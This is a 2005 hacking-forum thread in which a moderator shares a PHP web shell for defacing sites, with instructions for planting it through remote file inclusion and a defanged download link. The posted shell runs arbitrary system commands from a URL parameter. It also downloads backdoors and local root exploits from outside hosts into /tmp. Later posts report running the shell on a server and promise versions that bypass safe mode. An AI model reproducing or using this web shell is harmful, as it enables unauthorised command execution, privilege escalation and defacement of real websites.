|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 53
Members: 0
Total: 53
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Shell in PHP >Deface toolkit pro 1.6 |
|
Posted: Tue Jan 18, 2005 3:57 pm |
|
|
LINUX |
Moderator |
|
|
Joined: May 24, 2004 |
Posts: 404 |
Location: Caiman |
|
|
|
|
|
|
Very easy use only upload shell.php and exec commands xD
exellent for RFI (Remote file inclusion) for redirection shell ned rename shell.php to .txt .hac .lam .fuck or all .* not php
Example Code: | script_vuln.php?var_vuln=http://www.mysite.com/shell.txt |
Link
hxxp://tbc-labz.org/dwn/defacing_tool.zip (copy and paste and change xx for tt) xD |
|
|
|
|
Posted: Tue Jan 18, 2005 6:55 pm |
|
|
g0df4th3r |
Advanced user |
|
|
Joined: Sep 22, 2004 |
Posts: 52 |
Location: LV |
|
|
|
|
|
|
|
|
|
|
Posted: Tue Jan 18, 2005 9:46 pm |
|
|
SteX |
Advanced user |
|
|
Joined: May 18, 2004 |
Posts: 181 |
Location: Serbia |
|
|
|
|
|
|
|
_________________
We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
------------------------------------------------------- |
|
|
|
Posted: Wed Jan 19, 2005 6:07 am |
|
|
LINUX |
Moderator |
|
|
Joined: May 24, 2004 |
Posts: 404 |
Location: Caiman |
|
|
|
|
|
|
not english version but is very easy use |
|
|
|
|
|
|
|
|
Posted: Wed Jan 19, 2005 6:09 am |
|
|
LINUX |
Moderator |
|
|
Joined: May 24, 2004 |
Posts: 404 |
Location: Caiman |
|
|
|
|
|
|
short and good
view this men
Code: | <CENTER><DIV STYLE="font-family: verdana; font-size: 18px; font-weight: bold; color: #FF0000;">Infektion Group</DIV>
<BR><DIV STYLE="font-family: verdana; font-size: 16px; font-weight: bold; color: #FF0000;">Executor de Comandos v4.3</DIV>
<?php
closelog( );
$login = posix_getuid( );
$euid = posix_geteuid( );
$gid = posix_getgid( );
if ($chdir == "") $chdir = getcwd( );
?>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">
<?php
$uname = posix_uname( );
while (list($info, $value) = each ($uname)) {
?>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 10px;"><?= $info ?>: <?= $value ?></DIV></TD>
</TR>
<?php
}
?>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 10px;">Usu?rio: uid(<?= $login ?>) euid(<?= $euid ?>) gid(<?= $gid ?>)</DIV></TD>
</TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 10px;">Diret?rio Atual: <?= $chdir ?></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 10px;">Permiss?o de Escrita: <? if(@is_writable($chdir)){ echo "Sim"; }else{ echo "N?o"; } ?></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 10px;">Servidor: <?= "$SERVER_SOFTWARE $SERVER_VERSION"; ?></DIV></TD>
</TR>
</TABLE>
<BR>
<?php
if ($cmd != "") {
?>
<DIV STYLE="font-family: verdana; font-size: 12px; font-weight: bold; color: #FF0000;">Comando</DIV>
<?php
if (isset($chdir)) @chdir($chdir);
ob_start( );
passthru("$cmd 2>&1");
$output = ob_get_contents();
ob_end_clean( );
?>
<TEXTAREA COLS="75" ROWS="8" STYLE="font-family: verdana; font-size: 10px;">
<?php
if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
?>
</TEXTAREA>
<BR>
<?php
}
?>
<?php
if ($bs == "1") {
$fp = @fopen("http://www.infektiongroup.hpg.com.br/xpl/bd/bshell",r);
$fp2 = @fopen("/tmp/bs","w");
fwrite($fp2, "");
$fp1 = @fopen("/tmp/bs","a+");
for (;;) {
$read = @fread($fp, 4096);
if (empty($read)) break;
$ok = fwrite($fp1, $read);
if (empty($ok)) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[-] Erro</DIV>";
break;
}
}
if (!empty($ok)) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[*] Arquivo Enviado</DIV>";
}
}
if ($brk == "1") {
$fp = @fopen("http://www.infektiongroup.hpg.com.br/xpl/local/brk",r);
$fp2 = @fopen("/tmp/brk","w");
fwrite($fp2, "");
$fp1 = @fopen("/tmp/brk","a+");
for (;;) {
$read = @fread($fp, 4096);
if (empty($read)) break;
$ok = fwrite($fp1, $read);
if (empty($ok)) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[-] Erro</DIV>";
break;
}
}
if (!empty($ok)) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[*] Arquivo Enviado</DIV>";
}
}
?>
</CENTER>
<pre><font face="Tahoma" size="2">
<?php
if ($dx != "") {
$fp = @fopen("$hostxpl",r);
$fp2 = @fopen("$storage","w");
fwrite($fp2, "");
$fp1 = @fopen("$storage","a+");
for (;;) {
$read = @fread($fp, 4096);
if (empty($read)) break;
$ok = fwrite($fp1, $read);
if (empty($ok)) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[-] Erro</DIV>";
break;
}
}
if (!empty($ok)) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[*] Arquivo Enviado</DIV>";
}
}
flush( );
?>
<?
if ($kmod == "1") {
$fp = @fopen("http://www.vrfhp.hpg.com.br/pow20/kmod",r);
$fp2 = @fopen("/tmp/kmod","w");
fwrite($fp2, "");
$fp1 = @fopen("/tmp/kmod","a+");
for (;;) {
$read = @fread($fp, 4096);
if (empty($read)) break;
$ok = fwrite($fp1, $read);
if (empty($ok)) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[-] Erro</DIV>";
break;
}
}
if (!empty($ok)) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[*] Arquivo Enviado</DIV>";
}
}
?>
<?
if ($mremap == "1") {
$fp = @fopen("http://www.infektiongroup.hpg.com.br/xpl/local/local4",r);
$fp2 = @fopen("/tmp/local4","w");
fwrite($fp2, "");
$fp1 = @fopen("/tmp/local4","a+");
for (;;) {
$read = @fread($fp, 4096);
if (empty($read)) break;
$ok = fwrite($fp1, $read);
if (empty($ok)) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[-] Erro</DIV>";
break;
}
}
if (!empty($ok)) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[*] Arquivo Enviado</DIV>";
}
}
?>
<?
if ($cgi == "1") {
$fp = @fopen("http://www.infektiongroup.hpg.com.br/xpl/bd/cgi",r);
$fp2 = @fopen("/tmp/cgi","w");
fwrite($fp2, "");
$fp1 = @fopen("/tmp/cgi","a+");
for (;;) {
$read = @fread($fp, 4096);
if (empty($read)) break;
$ok = fwrite($fp1, $read);
if (empty($ok)) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[-] Erro</DIV>";
break;
}
}
if (!empty($ok)) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[*] Arquivo Enviado</DIV>";
}
}
?>
<?
if ($mass == "1") {
$fp = @fopen("http://www.infektiongroup.hpg.com.br/xpl/local/mass.jpg",r);
$fp2 = @fopen("$d","w");
fwrite($fp2, "");
$fp1 = @fopen("$d","a+");
for (;;) {
$read = @fread($fp, 4096);
if (empty($read)) break;
$ok = fwrite($fp1, $read);
if (empty($ok)) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[-] Erro</DIV>";
break;
}
}
if (!empty($ok)) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[*] Arquivo Enviado</DIV>";
}
}
?>
</font></pre>
|
hehe xD |
|
|
|
|
|
|
|
|
Posted: Wed Jan 19, 2005 7:37 am |
|
|
hebe |
Advanced user |
|
|
Joined: Sep 04, 2004 |
Posts: 59 |
|
|
|
|
|
|
|
|
|
|
|
|
a |
|
Posted: Wed Jan 19, 2005 2:29 pm |
|
|
SteX |
Advanced user |
|
|
Joined: May 18, 2004 |
Posts: 181 |
Location: Serbia |
|
|
|
|
|
|
It is Infektion Group - Executor de Comandos v4.3 |
|
_________________
We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
------------------------------------------------------- |
|
|
|
Posted: Fri Mar 11, 2005 3:27 pm |
|
|
Dora |
Regular user |
|
|
Joined: Dec 21, 2004 |
Posts: 10 |
|
|
|
|
|
|
|
To linux :
Could you share me this php shell scipts again ?
I get a error :
Fatal error: Call to undefined function posix_getuid() in /DISK2/WWW/nhoveem.ws/www/shell.php on line 5 |
|
|
|
|
Posted: Fri Mar 11, 2005 4:45 pm |
|
|
LINUX |
Moderator |
|
|
Joined: May 24, 2004 |
Posts: 404 |
Location: Caiman |
|
|
|
|
|
|
Dora wrote: | To linux :
Could you share me this php shell scipts again ?
I get a error :
Fatal error: Call to undefined function posix_getuid() in /DISK2/WWW/nhoveem.ws/www/shell.php on line 5 |
yes in 2 or 3 days i upload in my journal: complete shell bypass safemode and others 2 shells only wait |
|
|
|
|
www.waraxe.us Forum Index -> Tools
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|